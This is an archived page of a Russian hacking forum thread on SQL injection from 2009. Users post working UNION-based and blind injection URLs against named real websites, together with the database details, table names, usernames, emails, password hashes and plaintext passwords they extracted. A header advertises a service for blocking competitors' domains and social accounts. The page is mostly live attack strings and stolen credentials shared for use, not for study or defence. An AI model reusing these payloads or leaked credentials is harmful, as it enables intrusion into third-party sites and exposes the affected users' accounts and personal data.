УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 928 из 1242

928

Опции темы

Поиск в этой теме

Опции просмотра

#9271

09.05.2009, 12:46

HAXTA4OK

Reservists Of Antichat - Level 6

Регистрация: 15.03.2009

Сообщений: 560

Провел на форуме:
4358210

Репутация: 2017

Пацаны с праздником,ну что поехали по немцам

http://carnageclan.de/download_info.php?id=-1'+union+select+1,2,concat_ws(0x3a,user(),database (),version()),4,5,6,7,8,9,10,11,12,13,14/*

v099182@localhost:v099182:4.1.21-max-log

есть форум

tam

P.S за этот сайт спс mailbrush'y (3a no/\y4eHue info)
################################################## ##########

http://www.bitesser.de/freeware/script.php?id=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user() ,database(),version()),9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36--

web3_bitesser@localhost:web3_bitesser:5.0.26-log 1.1

tables:

http://www.bitesser.de/freeware/script.php?id=-1+union+select+1,2,3,4,5,6,7,group_concat(table_na me),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31,32,33,34,35,36+from+informat ion_schema.tables+group+by+table_schema+limit+1,1--

bit_scri_imp,rel_gs_group_gs_rights,rel_bit_member _bit_scri_imp,bit_tip,rel_tipprechnung_tippposten, rel_bit_news_bit_news_cat,forum_member,bit_job,rel _bit_scri_bit_scri_his,generic_id_tablenames,bit_n ews_sta,rel_bit_tip_bit_tip_cat,gs_rights,gs_user, bit_scri_lan,rel_gs_user_gs_group,rel_bit_member_b it_tip,bit_tip_cat,tippkunde,rel_bit_news

http://www.bitesser.de/freeware/script.php?id=-1+union+select+1,2,3,4,5,6,7,group_concat (column_name),9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36+from+information_schema.columns+where+table _name=0x67735f75736572--

generic_id,id,creation_date,creation_time,modify_d ate,modify_time,active,username,password,name,surn ame

(но что то она пустая)))

Последний раз редактировалось HAXTA4OK; 09.05.2009 в 13:00..

#9272

09.05.2009, 12:57

mailbrush

Познавший АНТИЧАТ

Регистрация: 24.06.2008

Сообщений: 1,996

Провел на форуме:
6075534

Репутация: 2731

Отправить сообщение для mailbrush с помощью ICQ

Код:

http://www.unipi.it/php/corsilaureaing/dett_corso.php?id=-218+union+select+null,null,version(),null,null,null,null,null,null,null,null,null,null,null,null

POSTGRESQL 7.1.3 ON SPARC-SUN-SOLARIS2.7, COMPILED BY GCC 2.8.1

Первый раз встречаюсь с PgSQL.

#9273

09.05.2009, 14:09

Rubaka

Участник форума

Регистрация: 02.09.2007

Сообщений: 292

Провел на форуме:
3659973

Репутация: 466

Отправить сообщение для Rubaka с помощью ICQ

http://www.carolinainnatvg.com/news_detail.php?n_recid=-17+UNION+SELECT+1,2,3,4,5,6,7,8,9

Database Version: 5.0.45-log
Database name: biztools_carolinainn
User name: biztools_127@localhost

http://www.mytimber.net/news_detail.php?newsid=11+UNION+SELECT+1,2,3,4,5,6 ,7,8,9+LIMIT+1,1

Database Version: 4.0.24-log
Database name: uob0q1_db
User name: uob0q1@localhost

Последний раз редактировалось Rubaka; 09.05.2009 в 14:45..

#9274

09.05.2009, 16:15

~~farex~~

Banned

Регистрация: 11.03.2009

Сообщений: 214

Провел на форуме:
914766

Репутация: 317

sql - blind
<<Центр дистанцонного обучения>>

Код:

http://www.tsiac.ru/cdo/index.php?id=14+or+ascii(substring(version(),1,1))=52--+

db: 4.......

#9275

09.05.2009, 17:09

..::TROYAN::..

Участник форума

Регистрация: 22.05.2008

Сообщений: 158

Провел на форуме:
2875309

Репутация: 348

Отправить сообщение для ..::TROYAN::.. с помощью ICQ

blind-sql:
www.aimp.ru

Код:

http://aimp.ru/index.php?do=view&id=5161+and+ascii(lower(substring(user(),2,1)))=105

user():aimp

Код:

http://aimp.ru/index.php?do=view&id=5161+and+substring(version(),1,1)=4

version():4....пля в 4й версии mysql неподдержуются подзапросы((((

#9276

09.05.2009, 17:37

InFlame

Участник форума

Регистрация: 27.10.2008

Сообщений: 215

Провел на форуме:
810079

Репутация: 90

http://www.derechoshumanos.org.mx/modules.php?name=News&file=article&sid=-301+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14

Вот только скобки фильтруются...

#9277

09.05.2009, 18:24

InFlame

Участник форума

Регистрация: 27.10.2008

Сообщений: 215

Провел на форуме:
810079

Репутация: 90

Target: metrocasas.com.mx

Evil link: http://metrocasas.com.mx/cliente/paginas/news.php?page=2&id_news=-60+union+select+1,2,3,4

Database info (user:version:database):
visiondig@localhost:4.1.21-standard-log:visiondig_metro

Users:
http://metrocasas.com.mx/cliente/paginas/news.php?page=2&id_news=-60+union+select+1,group_concat(login,0x3a,password ),3,4+from+users

#9278

09.05.2009, 19:05

~~F4R~~

Banned

Регистрация: 20.06.2008

Сообщений: 296

Провел на форуме:
1385078

Репутация: 126

Отправить сообщение для F4R с помощью ICQ

http://www.islam.com.mx/quiz_output.php?quiz_id=2%27/**/union/**/select+1,password,username,4,5,6,7,8,9+from+user/*

login: smontiel
pass: 445339 (за пасс благодарю поисковую систему гугл)

Последний раз редактировалось jokester; 09.05.2009 в 19:13.. Причина: шеллы запрещены

#9279

09.05.2009, 19:30

~~F4R~~

Banned

Регистрация: 20.06.2008

Сообщений: 296

Провел на форуме:
1385078

Репутация: 126

http://cambiodeluces.arts-history.mx/entrada.php?id=-254+UNION+SELECT+concat_ws(0x3a,version(),user(),d atabase()),2,3,4,5,6,7,8--

Database Version: 5.0.45-log
Database name: neoartes
User name: neoartes@localhost

[QUOTE]Getting Data from table blog_users from database neoartes
Fields username:email

assword

[0]:adminblogs:soporte@arts-history.mx:
[1]:mzavala:mzavala@arts-history.mx:85870bafb753ce276bfdb55c5e5630e3:Nr4HLK PIcVkaFMWpZMzeMd2LbknTKZ

Getting Data from table phpSP_users from database neoartes
Fields user

assword

[0]:mzavala@arts-history.mx:
[1]

ostafoto@prodigy.net.mx:ranita
[2]:correo@arts-history.mx:HNEJBQ
[3]:redaccion:noticias2008

Getting Data from table sre_sp_users from database neoartes
Fields user

assword

[0]:admin:admin
[1]:usuario:usuario

#9280

09.05.2009, 20:17

Skofield

Участник форума

Регистрация: 27.08.2008

Сообщений: 209

Провел на форуме:
1759582

Репутация: 394

http://www.kvbpr.com {PR 3}

Код:

http://www.kvbpr.com/news.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5--

5.0.67-community : kvbpr_kvbpr08 : kvbpr_idesign@localhost

table users:

Код:

http://www.kvbpr.com/news.php?id=-1+union+select+1,group_concat(name,0x3a,pass),3,4,5+from+users--

Страница 928 из 1242

928

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход